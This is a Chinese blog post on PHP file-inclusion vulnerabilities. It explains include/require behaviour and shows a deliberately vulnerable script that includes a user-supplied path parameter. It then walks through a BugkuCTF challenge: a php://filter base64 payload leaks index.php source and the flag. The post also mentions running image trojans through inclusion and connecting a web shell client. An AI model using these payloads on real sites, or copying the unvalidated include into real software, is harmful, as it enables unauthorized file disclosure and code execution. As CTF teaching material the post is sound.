07BugkuCTF的文件包含项目

最新推荐文章于 2024-06-05 14:15:00 发布
最新推荐文章于 2024-06-05 14:15:00 发布
阅读量529 收藏
点赞数
分类专栏: 笔记 文章标签: php mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28241709/article/details/107824136
版权

进入BugkuCTF之前我们先了解一下文件包含的基础知识。

一、文件包含

1.概念
文件包含:程序员通常会把可重复使用函数或语句写到单个文件中,在使用某个功能时,直接调用此文件,不用再编写调用文件的过程称为包含。
2.PHP 中的⽂件包含语句
PHP 提供了四个⽂件包含的语句,四个语句之间略有不同:

语句区别
include()多次包含,如果包含失败,脚本产⽣警告,继续运⾏。
include_once()⼀次包含,如果包含失败,脚本产⽣警告,继续运⾏。
require()多次包含,如果包含失败,脚本产⽣错误,结束执⾏。
require_once()⼀次包含,如果包含失败,脚本产⽣错误,结束执⾏。

相应配置:
⽂件包含是PHP 的基本功能之⼀,有本地⽂件包含与远程⽂件包含之分。
通俗来讲,本地⽂件包含就是可以读取和打开本地⽂件,远程⽂件包含就是可以远程(⽅式)加载⽂件。
可通过php的配置文件php.ini中的选项进行配置

allow_url_fopen = On/Off # http://|ftp:// 访问远程⽂件
allow_url_include = On/Off # require|include http://|ftp:// 访问远程⽂件

php.ini
包含示例:
示例代码:

// fileInclusion.php
if(!empty($_GET['path'])){
 include $_GET['path'];
}else{
 echo "?path=./info.php"; }

本地文件包含:

http://192.168.16.109/fileInclusion/fileInclusion.php?path=./info.php

在这里插入图片描述
远程⽂件包含

http://localhost/fileInclusion/fileInclusion.php?
path=http://192.168.16.109/phpinfo.php

2.漏洞原理及特点
优点:PHP ⽂件包含是程序设计的基础功能之⼀,能够减少代码量,提⾼开发效率。
缺点:会产生文件包含漏洞
漏洞原理:文件包含配置(php.ini)、动态调用、客户端可控。
特点:
⽆视⽂件扩展名读取⽂件。

# 直接读取图⽚的源代码
http://192.168.48.139/fileInclusion/fileInclusion.php?
path=../DVWA\dvwa\images\login_logo.png

在这里插入图片描述

⽆条件解析PHP 代码

# 当读取到被包含⽂件的源码,如果遇到符合PHP 代码规范的内容,就会⽆条件执⾏
# 同时为图⽚⽊⻢提供了出路
http://192.168.48.139/fileInclusion/fileInclusion.php?path=1_2.jpg

可以和图片木马结合,来执行图片木马,完了用蚁剑连接。

二、BugkuCTF的文件包含项目

在这里插入图片描述

http://123.206.87.240:8005/post/

在这里插入图片描述
查看源代码发现没什么有用的信息。在这里插入图片描述
然后直接点击
在这里插入图片描述
发现地址/post/index.php?file=show.php。
怀疑此处纯在文件包含漏洞。
尝试包含自己:?file=index.php
在这里插入图片描述
然后base64编码去读源代码
?file=php://filter/read=convert.base64-encode/resource=index.php
在这里插入图片描述

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

复制然后用bp解码

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

拿到flag
/flag:flag{edulcni_elif_lacol_si_siht}

魂梦aoin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 244
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
BugkuCTF-WEB题文件包含
am_03的博客
08-26 748
1.打开网页,点击click me? no链接 URL栏里显示:http://114.67.246.176:15077/index.php?file=show.php,可能存在文件包含漏洞 这里介绍一下:php:// 协议 条件: allow_url_fopen:off/on allow_url_include :仅php://input php://stdin php://memory php://temp 需要on 作用: php:// 访问各个输入/输出流(I/O streams),在CTF里经
CTF比赛是什么?需要学哪些东西,1篇文章给你讲透彻!
Python单行客的博客
06-05 858
CTF比赛是什么?需要学哪些东西,1篇文章给你讲透彻!
Bugku CTF-web8 文件包含
weixin_44023403的博客
04-22 469
Bugku CTF-web8 文件包含前言解题 前言 文件包含概述: 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 包含: 我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。 PH
文件包含漏洞 基础
weixin_50464560的博客
03-21 893
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
bugku 文件包含
weixin_74020633的博客
09-27 260
点击后,跳转到一个index页面,并且url后有flag=show.php,根据搜索知道这是典型的文件包含问题(虽然这里题目提示是文件包含了)之后尝试改为flag=index,发现不对。在开发过程中,当频繁需要跳转网页,或者需要某个函数时,程序员喜欢将重复的函数写道一个单独的文件中,在需要时调用文件,这种文件调用叫做文件包含。当调用的不是函数,而是一个文件时,就相当于把这个文件变了变量,也就给了用户操控参数的机会,就可能造成文件包含漏洞。通常获取源代码时,伪协议将xxx.php当文件执行,
bugkuctf解题-WEB
05-04
常见的攻击方式包括SQL注入、XSS(跨站脚本攻击)、CSRF(跨站请求伪造)、文件包含漏洞、命令注入等。对于这些攻击,我们需要了解它们的工作原理和防御措施。 1. SQL注入:当用户输入的数据未经有效过滤或转义就...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap的入门操作,...
Bugku-文件包含
qq_56611811的博客
05-16 198
得到flag{f285b417425153e41a60b28032c76395}file=show.php。试试能不能回到上级目录。
bugku题解-文件包含
qq_51775369的博客
10-15 1008
访问目标地址 发现有一个链接,点击,发现跳转到/index.php?file=show.php 之后就想到文件包含可以使用PHP伪协议,php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 在url后改为?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串...
BUGKU-文件包含-WriteUP
qq_26012889的博客
05-05 211
show.php(其实这个show.php就是个提示,提示flag在index.php中)那么目前知道了是伪协议文件包含文件接下来就要确定flag的目录了。当然这样直接猜目录还是靠运气,既然考伪协议,那么我们试着读一下这个。file=的包含先用常见的目录尝试猜测,往往事半功倍。可以看到这里直接执行了php,想看文件内容我们可以添加这个参数。这个可以上目录扫描看下,我没有这么做,试了几个简单的。2.伪协议读文件可以提供下一步的思路。关于PHP伪协议知识可以在这里补充。既然提示了文件包含,又看到。
BUGKU-WEB 文件包含
天泽岁月
02-22 1331
BUGKU-WEB 文件包含,PHP伪协议
BugKu never_give_up 文件包含1,2
wwwwyyyrre的博客
06-03 132
进入题目没什么信息 打开源代码看看发现有一个1p.html 打开这个网页看看 发现到了bugku的论坛在这里可以发现网站好象是被重定向了 但是我们做的题肯定不在公网ip里边访问一下 view-source:http://114.67.175.224:14207/1p.html 即在源代码页面访问1p.html发现了源代码 在这里可以看到输入网址就会被定向到论坛页面 后面有一串代码 复制下来看看是什么不知道是什么解码 用url和base解码试试用base解码发现是url编码进行url解码。
bugku文件包含
qq_62046696的博客
04-30 987
因为时文件包含的题目,首先尝试一下file=index.php,发现出现了报错信息。然后考虑用伪协议绕过一下 1.file=php://input仍然出现了报错信息,然后用一下其他的伪协议 2.file=php://filter/read=convert.base64-encode/resource=./index.php 得到base64加密的编码,通过base64解码就可以获取flag ...
文件包含-BugkuCTF
yuqie的博客
06-05 164
flag也藏在其中!
bugku ctf文件包含 writeup
l3oog1e的博客
05-25 6313
打开题目,直接显示代码<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>看到Request函数,很明显可以想到文件包含,这里hello是可控的,那么,就可以构造包含语句,?hello=1);show_source('f
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值